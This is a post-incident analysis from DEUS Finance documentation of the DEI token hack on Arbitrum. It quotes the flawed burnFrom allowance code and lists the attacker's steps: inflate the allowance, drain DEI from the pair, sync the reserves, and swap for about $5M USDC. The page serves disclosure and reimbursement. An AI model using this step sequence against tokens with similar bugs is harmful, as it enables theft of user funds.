# Attack Details

### Attack Details:

**By exploiting the DEI token implementation bug, the attacker could manipulate allowances, transfer DEI out of the pair, and swap it for a significant amount of USDC.** 

The series of events led to the massive security breach and loss of user funds on the Chronos Exchange on the Arbitrum platform, as well as on all other exchanges on which the DEI token was listed.

An in-depth examination of the attack can be found by analyzing the following Arbitrum transaction: <https://explorer.phalcon.xyz/tx/arbitrum/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef?line=25>

#### Here is a simplified explanation of the attacker's method and steps taken:

1. First, the attacker takes advantage of the bug in the DEI token implementation, which allows them to increase the allowance for any DEI holder. Consequently, the attacker can move any $DEI funds.

#### Step 1: The attacker calls DEI.burnFrom(spender = sAMM Pair, amount = 0).

The burnFrom implementation involves the approve implementation, where \_approve(sAMM, attacker, currentAllowance) is called. That allowed the attacker to spend any 'currentAllowance' from the sAMM Pair.

Link to the source code:\
<https://bscscan.com/address/0x1472b3081d81b792e697aea90accbbc4adc5baf9#code#F5#L308>

`_allowances[_msgSender()][account]`&#x20;

should be&#x20;

`_allowances[account][msgSender()]`

### The exploitable burnFrom function:

{% code fullWidth="true" %}

```
    function burnFrom(address account, uint256 amount) public virtual {
        uint256 currentAllowance = _allowances[_msgSender()][account];
        _approve(account, _msgSender(), currentAllowance - amount);
        _burn(account, amount);
    }
```

{% endcode %}

### The related \_approve function:

{% code lineNumbers="true" fullWidth="true" %}

```
function _approve( 
address owner, 
address spender, 
uint256 amount 
) internal virtual { 
_allowances[owner][spender] = amount; 
emit Approval(owner, spender, amount); 
}
```

{% endcode %}

### Step 2: The attacker abuses the broken `burnFrom` to increase his allowance & `transferFrom` all DEI out of the pair.

<figure><img src="/files/mgNuaqobvbjrQfe9EJew" alt=""><figcaption></figcaption></figure>

### Step 3: The attacker calls sAMM.sync()&#x20;

which recalculates the reserves based on the token balances.&#x20;

After calling `sync`,&#x20;

DEI `reserve0` is 1,&#x20;

USDC `reserve1` is 5,047,470,472,573.

<figure><img src="/files/uCNt2vB44E07MGu34Ntu" alt=""><figcaption></figcaption></figure>

#### Step 4:

* The attacker calls swap() and trades the difference. Now, 0 DEI is worth 5 million USDC.

Call swap() and trade the difference; 0 DEI is worth 5M USDC now.

<figure><img src="/files/9bRCeyR8djW8MjY0WZax" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/x0RZKUc8hCiv6wwtL4pz" alt=""><figcaption></figcaption></figure>

### Step 5: The attacker transfers DEI back&#x20;

This step allowed for massive further damages.&#x20;

<figure><img src="/files/DLvYjdJo6K2Q1ImKNuTY" alt=""><figcaption></figcaption></figure>

This step allows for massive, massive further damages.&#x20;

Attackers' accrued profits of approximately $5 million, yet the consequential damages far exceed this figure, estimated to be between $8-10 million based on our current analysis. (before recovering funds, check recovery [here](/contracts/reimbursement-guide/dei-depeg.md#recovering-funds))

Based on this step, we conjecture that the attacker opted for a rushed approach, likely fearing that someone else might discover the bug or that his main target was causing maximum damage.

Read more about it [here.](/contracts/reimbursement-guide/dei-depeg/incident-analytic-summary.md#exploiter-profile)<br>

### Relevant Links:

1. Transaction leading to the hack:[ https://arbiscan.io/tx/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef](https://arbiscan.io/tx/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef)
2. Address holding funds after the attacker swapped USDC to WETH:[ https://arbiscan.io/address/0x189cf534de3097c08b6beaf6eb2b9179dab122d1](https://arbiscan.io/address/0x189cf534de3097c08b6beaf6eb2b9179dab122d1)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.deus.finance/contracts/reimbursement-guide/dei-depeg/incident-analytic-summary/attack-details.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.